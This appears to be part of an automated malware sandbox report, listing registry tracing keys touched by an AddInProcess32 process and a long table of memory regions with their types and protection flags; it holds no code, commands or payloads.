HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Tracing\AddInProcess32_RASMANCS
|
FileDirectory
|
There are 59 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
584000
|
heap
|
page read and write
|
||
|
52E5000
|
heap
|
page read and write
|
||
|
363E000
|
trusted library allocation
|
page read and write
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
190000
|
heap
|
page read and write
|
||
|
52D3000
|
heap
|
page read and write
|
||
|
110000
|
heap
|
page read and write
|
||
|
C4D000
|
stack
|
page read and write
|
||
|
37A000
|
heap
|
page read and write
|
||
|
37E0000
|
trusted library allocation
|
page read and write
|
||
|
1DA5000
|
heap
|
page read and write
|
||
|
1E33000
|
direct allocation
|
page read and write
|
||
|
1CA10000
|
heap
|
page read and write
|
||
|
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
|
1D80000
|
direct allocation
|
page read and write
|
||
|
503000
|
heap
|
page read and write
|
||
|
4F21000
|
heap
|
page read and write
|
||
|
122B1000
|
trusted library allocation
|
page read and write
|
||
|
1AA40000
|
heap
|
page read and write
|
||
|
291000
|
heap
|
page read and write
|
||
|
348000
|
trusted library allocation
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
2FB000
|
heap
|
page read and write
|
||
|
2AA000
|
heap
|
page read and write
|
||
|
247E000
|
trusted library allocation
|
page read and write
|
||
|
1B076000
|
heap
|
page read and write
|
||
|
1BE0000
|
heap
|
page read and write
|
||
|
1CD000
|
trusted library allocation
|
page execute and read and write
|
||
|
2306000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
5234000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
7FE89A5C000
|
trusted library allocation
|
page read and write
|
||
|
53E000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
479000
|
heap
|
page read and write
|
||
|
3C9D000
|
stack
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
50DC000
|
heap
|
page read and write
|
||
|
1A7EF000
|
stack
|
page read and write
|
||
|
25DC000
|
trusted library allocation
|
page read and write
|
||
|
50DC000
|
heap
|
page read and write
|
||
|
1A76B000
|
stack
|
page read and write
|
||
|
3B84000
|
heap
|
page read and write
|
||
|
2A34000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
1E27000
|
direct allocation
|
page read and write
|
||
|
B3E000
|
stack
|
page read and write
|
||
|
1CD6000
|
heap
|
page read and write
|
||
|
7FE89B90000
|
trusted library allocation
|
page read and write
|
||
|
200F000
|
stack
|
page read and write
|
||
|
1B0FE000
|
stack
|
page read and write
|
||
|
7FE898A2000
|
trusted library allocation
|
page read and write
|
||
|
2F28000
|
trusted library allocation
|
page read and write
|
||
|
209F000
|
stack
|
page read and write
|
||
|
12D000
|
heap
|
page read and write
|
||
|
4D95000
|
heap
|
page read and write
|
||
|
7FE89B60000
|
trusted library allocation
|
page read and write
|
||
|
39A4000
|
heap
|
page read and write
|
||
|
537000
|
heap
|
page read and write
|
||
|
27FF000
|
trusted library allocation
|
page read and write
|
||
|
4EC000
|
heap
|
page read and write
|
||
|
2BD000
|
heap
|
page read and write
|
||
|
22C4000
|
trusted library allocation
|
page read and write
|
||
|
4B0000
|
heap
|
page read and write
|
||
|
5F6000
|
heap
|
page read and write
|
||
|
1F0000
|
heap
|
page read and write
|
||
|
523C000
|
heap
|
page read and write
|
||
|
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
|
95FF000
|
trusted library allocation
|
page read and write
|
||
|
4D9E000
|
stack
|
page read and write
|
||
|
2622000
|
trusted library allocation
|
page read and write
|
||
|
122C1000
|
trusted library allocation
|
page read and write
|
||
|
5F6000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
7FE89B40000
|
trusted library allocation
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
4E0E000
|
heap
|
page read and write
|
||
|
544D000
|
heap
|
page read and write
|
||
|
5559000
|
heap
|
page read and write
|
||
|
1C1A8000
|
stack
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
7FE89B1C000
|
trusted library allocation
|
page read and write
|
||
|
2E0B000
|
trusted library allocation
|
page read and write
|
||
|
2C50000
|
heap
|
page read and write
|
||
|
464000
|
heap
|
page read and write
|
||
|
3E95000
|
heap
|
page read and write
|
||
|
2F25000
|
trusted library allocation
|
page read and write
|
||
|
4D94000
|
heap
|
page read and write
|
||
|
4FD6000
|
heap
|
page read and write
|
||
|
1B3D5000
|
heap
|
page read and write
|
||
|
399B000
|
heap
|
page read and write
|
||
|
20E9000
|
heap
|
page read and write
|
||
|
1A64F000
|
stack
|
page read and write
|
||
|
598000
|
heap
|
page read and write
|
||
|
276D000
|
trusted library allocation
|
page read and write
|
||
|
3954000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
3BFF000
|
trusted library allocation
|
page read and write
|
||
|
4E0F000
|
heap
|
page read and write
|
||
|
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1DA0000
|
heap
|
page read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
22D7000
|
trusted library allocation
|
page read and write
|
||
|
386000
|
heap
|
page read and write
|
||
|
1C249000
|
heap
|
page read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
54B000
|
heap
|
page read and write
|
||
|
1B0000
|
trusted library allocation
|
page read and write
|
||
|
3F62000
|
heap
|
page read and write
|
||
|
47A000
|
heap
|
page read and write
|
||
|
7FE89AD0000
|
trusted library allocation
|
page read and write
|
||
|
258000
|
heap
|
page read and write
|
||
|
4E9E000
|
heap
|
page read and write
|
||
|
31FF000
|
trusted library allocation
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
3F10000
|
heap
|
page read and write
|
||
|
476000
|
heap
|
page read and write
|
||
|
52DA000
|
heap
|
page read and write
|
||
|
1E20000
|
direct allocation
|
page read and write
|
||
|
4EEC000
|
heap
|
page read and write
|
||
|
2E01000
|
trusted library allocation
|
page read and write
|
||
|
1F0E000
|
heap
|
page execute and read and write
|
||
|
2F35000
|
trusted library allocation
|
page read and write
|
||
|
522B000
|
heap
|
page read and write
|
||
|
180000
|
heap
|
page read and write
|
||
|
5062000
|
heap
|
page read and write
|
||
|
3F0A000
|
heap
|
page read and write
|
||
|
3B8000
|
heap
|
page read and write
|
||
|
470000
|
heap
|
page read and write
|
||
|
3997000
|
heap
|
page read and write
|
||
|
1EC0000
|
heap
|
page read and write
|
||
|
26FF000
|
trusted library allocation
|
page read and write
|
||
|
150000
|
heap
|
page read and write
|
||
|
4A7000
|
direct allocation
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
1C93A000
|
stack
|
page read and write
|
||
|
3F7D000
|
heap
|
page read and write
|
||
|
50D2000
|
heap
|
page read and write
|
||
|
508000
|
heap
|
page read and write
|
||
|
3F0E000
|
heap
|
page read and write
|
||
|
1C24B000
|
heap
|
page read and write
|
||
|
50E2000
|
heap
|
page read and write
|
||
|
1B04F000
|
stack
|
page read and write
|
||
|
4BD000
|
direct allocation
|
page read and write
|
||
|
21DE000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1B1CE000
|
stack
|
page read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
522000
|
heap
|
page read and write
|
||
|
1B4B0000
|
heap
|
page read and write
|
||
|
1E00000
|
direct allocation
|
page read and write
|
||
|
43EF000
|
stack
|
page read and write
|
||
|
4FF7000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3F7B000
|
heap
|
page read and write
|
||
|
320000
|
trusted library allocation
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
589000
|
heap
|
page read and write
|
||
|
2355000
|
trusted library allocation
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
3950000
|
heap
|
page read and write
|
||
|
1AB14000
|
heap
|
page read and write
|
||
|
4D95000
|
heap
|
page read and write
|
||
|
4FE6000
|
heap
|
page read and write
|
||
|
55A000
|
heap
|
page read and write
|
||
|
191000
|
heap
|
page read and write
|
||
|
5042000
|
heap
|
page read and write
|
||
|
3FC0000
|
heap
|
page read and write
|
||
|
7FE89A42000
|
trusted library allocation
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
12290000
|
trusted library allocation
|
page read and write
|
||
|
5ED000
|
heap
|
page read and write
|
||
|
4E0000
|
heap
|
page read and write
|
||
|
145000
|
heap
|
page read and write
|
||
|
4CE1000
|
heap
|
page read and write
|
||
|
7FE8995C000
|
trusted library allocation
|
page execute and read and write
|
||
|
9FFF000
|
trusted library allocation
|
page read and write
|
||
|
5A5000
|
heap
|
page read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
21B000
|
stack
|
page read and write
|
||
|
4A0000
|
direct allocation
|
page read and write
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
119000
|
heap
|
page read and write
|
||
|
572000
|
heap
|
page read and write
|
||
|
1C293000
|
heap
|
page read and write
|
||
|
1AB0F000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
3F12000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
1E0000
|
trusted library allocation
|
page read and write
|
||
|
2E0D000
|
trusted library allocation
|
page read and write
|
||
|
236E000
|
trusted library allocation
|
page read and write
|
||
|
121000
|
heap
|
page read and write
|
||
|
1AC19000
|
stack
|
page read and write
|
||
|
2E6000
|
heap
|
page read and write
|
||
|
3E80000
|
heap
|
page read and write
|
||
|
4CA0000
|
heap
|
page read and write
|
||
|
2E4000
|
heap
|
page read and write
|
||
|
37F6000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
4EE000
|
heap
|
page read and write
|
||
|
7FE89BC0000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
330000
|
heap
|
page read and write
|
||
|
45D000
|
heap
|
page read and write
|
||
|
4FB000
|
heap
|
page read and write
|
||
|
1B43C000
|
stack
|
page read and write
|
||
|
23E4000
|
trusted library allocation
|
page read and write
|
||
|
3F7D000
|
heap
|
page read and write
|
||
|
1C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
3F18000
|
heap
|
page read and write
|
||
|
500000
|
heap
|
page read and write
|
||
|
D9000
|
heap
|
page read and write
|
||
|
380000
|
heap
|
page read and write
|
||
|
3970000
|
trusted library allocation
|
page read and write
|
||
|
3F15000
|
heap
|
page read and write
|
||
|
16E000
|
heap
|
page read and write
|
||
|
49AF000
|
stack
|
page read and write
|
||
|
5AFE000
|
stack
|
page read and write
|
||
|
2321000
|
trusted library allocation
|
page read and write
|
||
|
191000
|
heap
|
page read and write
|
||
|
835000
|
heap
|
page read and write
|
||
|
4C0000
|
direct allocation
|
page read and write
|
||
|
7FE89BF0000
|
trusted library allocation
|
page read and write
|
||
|
4DE000
|
stack
|
page read and write
|
||
|
302000
|
heap
|
page read and write
|
||
|
23D0000
|
trusted library allocation
|
page read and write
|
||
|
23FE000
|
trusted library allocation
|
page read and write
|
||
|
152000
|
heap
|
page read and write
|
||
|
2290000
|
heap
|
page execute and read and write
|
||
|
7FE89AB0000
|
trusted library allocation
|
page read and write
|
||
|
1AA38000
|
stack
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
150000
|
trusted library allocation
|
page read and write
|
||
|
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
|
4D7E000
|
heap
|
page read and write
|
||
|
50DE000
|
heap
|
page read and write
|
||
|
7FE89A53000
|
trusted library allocation
|
page read and write
|
||
|
1C26E000
|
heap
|
page read and write
|
||
|
18E000
|
heap
|
page read and write
|
||
|
BA0000
|
heap
|
page execute and read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
3997000
|
heap
|
page read and write
|
||
|
144000
|
heap
|
page read and write
|
||
|
1C63C000
|
stack
|
page read and write
|
||
|
3F1A000
|
heap
|
page read and write
|
||
|
7FE898A3000
|
trusted library allocation
|
page execute and read and write
|
||
|
229000
|
heap
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
1C6DE000
|
stack
|
page read and write
|
||
|
523E000
|
stack
|
page read and write
|
||
|
310000
|
trusted library allocation
|
page read and write
|
||
|
40CB000
|
stack
|
page read and write
|
||
|
360000
|
heap
|
page read and write
|
||
|
1B040000
|
heap
|
page read and write
|
||
|
1DDB000
|
heap
|
page read and write
|
||
|
3F14000
|
heap
|
page read and write
|
||
|
3063000
|
trusted library allocation
|
page read and write
|
||
|
1C76E000
|
stack
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
2D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
396000
|
heap
|
page read and write
|
||
|
149000
|
heap
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
3D20000
|
trusted library allocation
|
page read and write
|
||
|
1AA8A000
|
heap
|
page read and write
|
||
|
21F4000
|
heap
|
page read and write
|
||
|
4E8000
|
heap
|
page read and write
|
||
|
594000
|
heap
|
page read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
470D000
|
stack
|
page read and write
|
||
|
52E5000
|
heap
|
page read and write
|
||
|
241E000
|
stack
|
page read and write | page guard
|
||
|
3961000
|
heap
|
page read and write
|
||
|
1C94000
|
heap
|
page read and write
|
||
|
4171000
|
trusted library allocation
|
page read and write
|
||
|
5081000
|
heap
|
page read and write
|
||
|
52CD000
|
heap
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
1C12000
|
trusted library allocation
|
page read and write
|
||
|
2E05000
|
trusted library allocation
|
page read and write
|
||
|
2300000
|
heap
|
page execute and read and write
|
||
|
125000
|
heap
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
1F60000
|
heap
|
page execute and read and write
|
||
|
7FE89AF0000
|
trusted library allocation
|
page read and write
|
||
|
4EA1000
|
heap
|
page read and write
|
||
|
4F4C000
|
stack
|
page read and write
|
||
|
2F3F000
|
trusted library allocation
|
page read and write
|
||
|
5430000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
5DD000
|
heap
|
page read and write
|
||
|
26A0000
|
trusted library allocation
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
4FF000
|
heap
|
page read and write
|
||
|
7FE89A60000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F0000
|
trusted library allocation
|
page read and write
|
||
|
452000
|
heap
|
page read and write
|
||
|
3EA2000
|
heap
|
page read and write
|
||
|
350000
|
heap
|
page read and write
|
||
|
1C10000
|
trusted library allocation
|
page read and write
|
||
|
292000
|
stack
|
page read and write
|
||
|
5D2000
|
heap
|
page read and write
|
||
|
52EA000
|
heap
|
page read and write
|
||
|
522B000
|
heap
|
page read and write
|
||
|
52DA000
|
heap
|
page read and write
|
||
|
3F80000
|
trusted library allocation
|
page read and write
|
||
|
4E0E000
|
heap
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
3B6000
|
heap
|
page read and write
|
||
|
4D3A000
|
heap
|
page read and write
|
||
|
7FE89A84000
|
trusted library allocation
|
page read and write
|
||
|
2372000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page execute and read and write
|
||
|
399B000
|
heap
|
page read and write
|
||
|
7FE898B3000
|
trusted library allocation
|
page read and write
|
||
|
1DD000
|
trusted library allocation
|
page execute and read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
5FB000
|
heap
|
page read and write
|
||
|
122000
|
stack
|
page read and write
|
||
|
3760000
|
heap
|
page read and write
|
||
|
23D8000
|
trusted library allocation
|
page read and write
|
||
|
4CE0000
|
heap
|
page read and write
|
||
|
23B6000
|
trusted library allocation
|
page read and write
|
||
|
4DA0000
|
heap
|
page read and write
|
||
|
52DA000
|
heap
|
page read and write
|
||
|
3960000
|
heap
|
page read and write
|
||
|
7FE89950000
|
trusted library allocation
|
page read and write
|
||
|
3E7F000
|
stack
|
page read and write
|
||
|
3F7B000
|
heap
|
page read and write
|
||
|
1ED0000
|
heap
|
page execute and read and write
|
||
|
7FE898A4000
|
trusted library allocation
|
page read and write
|
||
|
5231000
|
heap
|
page read and write
|
||
|
5DF000
|
heap
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
52A000
|
heap
|
page read and write
|
||
|
475000
|
heap
|
page read and write
|
||
|
577000
|
heap
|
page read and write
|
||
|
3EE6000
|
heap
|
page read and write
|
||
|
152000
|
heap
|
page read and write
|
||
|
188000
|
stack
|
page read and write
|
||
|
4BF000
|
direct allocation
|
page read and write
|
||
|
4E6000
|
heap
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
2AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
2690000
|
trusted library allocation
|
page read and write
|
||
|
418000
|
heap
|
page read and write
|
||
|
1E27000
|
direct allocation
|
page read and write
|
||
|
7FE89A82000
|
trusted library allocation
|
page read and write
|
||
|
4D8F000
|
heap
|
page read and write
|
||
|
3F6000
|
heap
|
page read and write
|
||
|
23FC000
|
trusted library allocation
|
page read and write
|
||
|
3EA2000
|
heap
|
page read and write
|
||
|
4FA7000
|
heap
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
3F0A000
|
heap
|
page read and write
|
||
|
29A0000
|
trusted library allocation
|
page execute read
|
||
|
5F3000
|
heap
|
page read and write
|
||
|
3F73000
|
heap
|
page read and write
|
||
|
1FC0000
|
heap
|
page read and write
|
||
|
50E000
|
heap
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
7FE898AD000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B03E000
|
stack
|
page read and write
|
||
|
1A939000
|
stack
|
page read and write
|
||
|
2E07000
|
trusted library allocation
|
page read and write
|
||
|
8F0000
|
heap
|
page read and write
|
||
|
4BB000
|
direct allocation
|
page read and write
|
||
|
39A0000
|
heap
|
page read and write
|
||
|
3B30000
|
trusted library allocation
|
page read and write
|
||
|
5234000
|
heap
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
3EE000
|
heap
|
page read and write
|
||
|
1DE0000
|
direct allocation
|
page read and write
|
||
|
50E7000
|
heap
|
page read and write
|
||
|
12281000
|
trusted library allocation
|
page read and write
|
||
|
8BFF000
|
trusted library allocation
|
page read and write
|
||
|
250000
|
heap
|
page read and write
|
||
|
1B7DB000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
22B1000
|
trusted library allocation
|
page read and write
|
||
|
7FE89986000
|
trusted library allocation
|
page execute and read and write
|
||
|
4F1F000
|
heap
|
page read and write
|
||
|
513000
|
heap
|
page read and write
|
||
|
57D000
|
stack
|
page read and write
|
||
|
3FA000
|
heap
|
page read and write
|
||
|
305000
|
heap
|
page read and write
|
||
|
530B000
|
heap
|
page read and write
|
||
|
3C9000
|
heap
|
page read and write
|
||
|
1AACC000
|
heap
|
page read and write
|
||
|
2200000
|
heap
|
page read and write
|
||
|
3CA0000
|
trusted library allocation
|
page read and write
|
||
|
4D91000
|
heap
|
page read and write
|
||
|
7FFFFF00000
|
trusted library allocation
|
page execute and read and write
|
||
|
1CB0000
|
heap
|
page execute and read and write
|
||
|
23BC000
|
trusted library allocation
|
page read and write
|
||
|
17F000
|
heap
|
page read and write
|
||
|
4A3000
|
direct allocation
|
page read and write
|
||
|
39A5000
|
heap
|
page read and write
|
||
|
573000
|
heap
|
page read and write
|
||
|
30D000
|
heap
|
page read and write
|
||
|
484E000
|
stack
|
page read and write
|
||
|
220000
|
heap
|
page read and write
|
||
|
241F000
|
stack
|
page read and write
|
||
|
29A000
|
trusted library allocation
|
page execute and read and write
|
||
|
305F000
|
stack
|
page read and write
|
||
|
4F8000
|
heap
|
page read and write
|
||
|
4960000
|
heap
|
page read and write
|
||
|
2156000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
520A000
|
heap
|
page read and write
|
||
|
417D000
|
trusted library allocation
|
page read and write
|
||
|
3CA0000
|
trusted library allocation
|
page read and write
|
||
|
4F27000
|
heap
|
page read and write
|
||
|
50A000
|
heap
|
page read and write
|
||
|
7FE89B80000
|
trusted library allocation
|
page read and write
|
||
|
7FE898BB000
|
trusted library allocation
|
page read and write
|
||
|
3B2E000
|
stack
|
page read and write
|
||
|
4F09000
|
heap
|
page read and write
|
||
|
530C000
|
heap
|
page read and write
|
||
|
7FE89B20000
|
trusted library allocation
|
page read and write
|
||
|
51B000
|
heap
|
page read and write
|
||
|
1C28D000
|
heap
|
page read and write
|
||
|
219E000
|
heap
|
page read and write
|
||
|
1AAA6000
|
heap
|
page read and write
|
||
|
1F40000
|
heap
|
page read and write
|
||
|
1BA0000
|
heap
|
page read and write
|
||
|
1C277000
|
heap
|
page read and write
|
||
|
1B3D0000
|
heap
|
page read and write
|
||
|
17D000
|
heap
|
page read and write
|
||
|
2A7000
|
trusted library allocation
|
page execute and read and write
|
||
|
3460000
|
trusted library allocation
|
page read and write
|
||
|
8B5000
|
heap
|
page read and write
|
||
|
318A000
|
stack
|
page read and write
|
||
|
480000
|
heap
|
page read and write
|
||
|
1A808000
|
stack
|
page read and write
|
||
|
3F06000
|
heap
|
page read and write
|
||
|
4180000
|
trusted library allocation
|
page read and write
|
||
|
2163000
|
heap
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
3F1A000
|
heap
|
page read and write
|
||
|
40C000
|
heap
|
page read and write
|
||
|
3EFB000
|
heap
|
page read and write
|
||
|
47C0000
|
heap
|
page execute and read and write
|
||
|
122E1000
|
trusted library allocation
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
1AAF1000
|
heap
|
page read and write
|
||
|
50EE000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
50E2000
|
heap
|
page read and write
|
||
|
1A474000
|
heap
|
page execute and read and write
|
||
|
37C0000
|
heap
|
page read and write
|
||
|
512C000
|
heap
|
page read and write
|
||
|
52E7000
|
heap
|
page read and write
|
||
|
366C000
|
stack
|
page read and write
|
||
|
1FD000
|
heap
|
page read and write
|
||
|
3FF000
|
heap
|
page read and write
|
||
|
467F000
|
stack
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
3B0000
|
heap
|
page read and write
|
||
|
408000
|
heap
|
page read and write
|
||
|
4D91000
|
heap
|
page read and write
|
||
|
3F2E000
|
stack
|
page read and write
|
||
|
3CA0000
|
trusted library allocation
|
page read and write
|
||
|
433000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89B30000
|
trusted library allocation
|
page read and write
|
||
|
4AF000
|
heap
|
page read and write
|
||
|
106000
|
heap
|
page read and write
|
||
|
50A1000
|
heap
|
page read and write
|
||
|
10000
|
heap
|
page read and write
|
||
|
1A0000
|
trusted library allocation
|
page read and write
|
||
|
2281000
|
trusted library allocation
|
page read and write
|
||
|
56C000
|
heap
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
122B7000
|
trusted library allocation
|
page read and write
|
||
|
53A000
|
heap
|
page read and write
|
||
|
1C800000
|
heap
|
page read and write
|
||
|
1D0000
|
heap
|
page read and write
|
||
|
7FE89AE0000
|
trusted library allocation
|
page read and write
|
||
|
477000
|
heap
|
page read and write
|
||
|
1DA0000
|
direct allocation
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
3F7B000
|
heap
|
page read and write
|
||
|
7FE89AA0000
|
trusted library allocation
|
page read and write
|
||
|
292000
|
trusted library allocation
|
page read and write
|
||
|
4D91000
|
heap
|
page read and write
|
||
|
460000
|
heap
|
page read and write
|
||
|
3F0A000
|
heap
|
page read and write
|
||
|
D0000
|
heap
|
page read and write
|
||
|
4FFF000
|
trusted library allocation
|
page read and write
|
||
|
1DC0000
|
direct allocation
|
page read and write
|
||
|
1B6BE000
|
stack
|
page read and write
|
||
|
460000
|
direct allocation
|
page read and write
|
||
|
7FE899C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D95000
|
heap
|
page read and write
|
||
|
5B0000
|
heap
|
page execute and read and write
|
||
|
4F27000
|
heap
|
page read and write
|
||
|
19C000
|
stack
|
page read and write
|
||
|
530000
|
trusted library allocation
|
page execute and read and write
|
||
|
13B000
|
heap
|
page read and write
|
||
|
1B7A0000
|
heap
|
page read and write
|
||
|
7FE89C00000
|
trusted library allocation
|
page read and write
|
||
|
570000
|
heap
|
page read and write
|
||
|
3F14000
|
heap
|
page read and write
|
||
|
7FE89960000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89AA8000
|
trusted library allocation
|
page read and write
|
||
|
4D7E000
|
heap
|
page read and write
|
||
|
1AB09000
|
heap
|
page read and write
|
||
|
54A0000
|
trusted library allocation
|
page read and write
|
||
|
296000
|
trusted library allocation
|
page execute and read and write
|
||
|
14A000
|
heap
|
page read and write
|
||
|
5080000
|
heap
|
page read and write
|
||
|
48E000
|
heap
|
page read and write
|
||
|
2481000
|
trusted library allocation
|
page read and write
|
||
|
3F6C000
|
heap
|
page read and write
|
||
|
3B9000
|
heap
|
page read and write
|
||
|
52D7000
|
heap
|
page read and write
|
||
|
527000
|
heap
|
page read and write
|
||
|
1A5DE000
|
stack
|
page read and write
|
||
|
1E50000
|
heap
|
page read and write
|
||
|
1B37C000
|
stack
|
page read and write
|
||
|
85F000
|
heap
|
page read and write
|
||
|
1C0000
|
trusted library allocation
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
3321000
|
trusted library allocation
|
page read and write
|
||
|
852000
|
heap
|
page read and write
|
||
|
535000
|
heap
|
page read and write
|
||
|
4F25000
|
heap
|
page read and write
|
||
|
1A2FC000
|
stack
|
page read and write
|
||
|
1E33000
|
direct allocation
|
page read and write
|
||
|
45FF000
|
trusted library allocation
|
page read and write
|
||
|
3B70000
|
heap
|
page read and write
|
||
|
215000
|
stack
|
page read and write
|
||
|
1AAB1000
|
heap
|
page read and write
|
||
|
1E8F000
|
stack
|
page read and write
|
||
|
4EA000
|
heap
|
page read and write
|
||
|
1C14E000
|
stack
|
page read and write
|
||
|
374000
|
heap
|
page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
1BD6000
|
heap
|
page read and write
|
||
|
2188000
|
heap
|
page read and write
|
||
|
1C4000
|
trusted library allocation
|
page read and write
|
||
|
4165000
|
trusted library allocation
|
page read and write
|
||
|
414000
|
heap
|
page read and write
|
||
|
2E12000
|
trusted library allocation
|
page read and write
|
||
|
7FE89AA4000
|
trusted library allocation
|
page read and write
|
||
|
1A6EF000
|
stack
|
page read and write
|
||
|
1FF000
|
trusted library allocation
|
page read and write
|
||
|
7FE89BD0000
|
trusted library allocation
|
page read and write
|
||
|
3D1C000
|
stack
|
page read and write
|
||
|
358000
|
stack
|
page read and write
|
||
|
4AB000
|
heap
|
page read and write
|
||
|
1AABA000
|
heap
|
page read and write
|
||
|
27A2000
|
trusted library allocation
|
page read and write
|
||
|
63FF000
|
trusted library allocation
|
page read and write
|
||
|
487000
|
heap
|
page read and write
|
||
|
52E0000
|
heap
|
page read and write
|
||
|
152000
|
heap
|
page read and write
|
||
|
1C16000
|
heap
|
page read and write
|
||
|
817000
|
heap
|
page read and write
|
||
|
1B7A5000
|
heap
|
page read and write
|
||
|
556000
|
heap
|
page read and write
|
||
|
1D60000
|
heap
|
page read and write
|
||
|
173000
|
heap
|
page read and write
|
||
|
1CA0000
|
heap
|
page read and write
|
||
|
27AC000
|
trusted library allocation
|
page read and write
|
||
|
